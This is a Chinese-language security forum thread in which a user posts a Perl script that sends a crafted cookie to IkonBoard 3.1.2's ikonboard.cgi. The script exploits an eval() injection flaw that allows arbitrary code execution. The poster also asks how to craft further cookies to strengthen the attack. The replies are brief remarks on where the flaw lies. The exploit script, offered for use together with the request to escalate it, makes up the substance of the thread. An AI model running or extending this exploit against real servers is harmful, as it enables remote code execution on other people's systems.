|
![]() | 作者: bei [bei]
![]() |
登录 |
#!/usr/bin/perl -w use strict; my $HOST = 'www.example.domain'; my $PATH = '/cgi-bin/ikonboard.cgi'; use IO::Socket; my $sock = IO::Socket::INET->new("$HOST:80") or die "connect: $!"; $sock->print(<<END) or die "write: $!"; GET $PATH HTTP/1.1 Host: $HOST Cookie: lang=%2E%00%22 Connection: close END print while <$sock>; ============================================================================ 这是ikonboard的一个漏洞的利用程序,对3.1.2有效,其中的cookie代表的意思我不是很清楚,请高手执教,还有我们还可以怎样利用这个漏洞,编一些cookie来提升攻击的能力? 漏洞情况如下? IkonBoard 是一款完整的 web 公告牌系统,执行 Perl/CGI 脚本。 在 Perl 代码中发现缺陷,问题存在于 Perl 的 eval() 函数处理的串,Perl 代码在嵌入该串之前会清除用户的输入信息,允许攻击者执行任意 Perl 计算和强制执行任意指令。 |
地主 发表时间: 09/15 22:00 |
![]() | 回复: NetDemon [netdemon] ![]() |
登录 |
攻击性依赖于服务器上的ikonboard.cgi而不依赖于你贴上来这段代码 |
B1层 发表时间: 09/15 22:11 |
![]() | 回复: bei [bei] ![]() |
登录 |
问题处在cookie上面。 |
B2层 发表时间: 09/16 16:34 |
![]() | 回复: frefreeney [frefreeney] ![]() |
登录 |
很好,,明白了 |
B3层 发表时间: 09/26 10:55 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号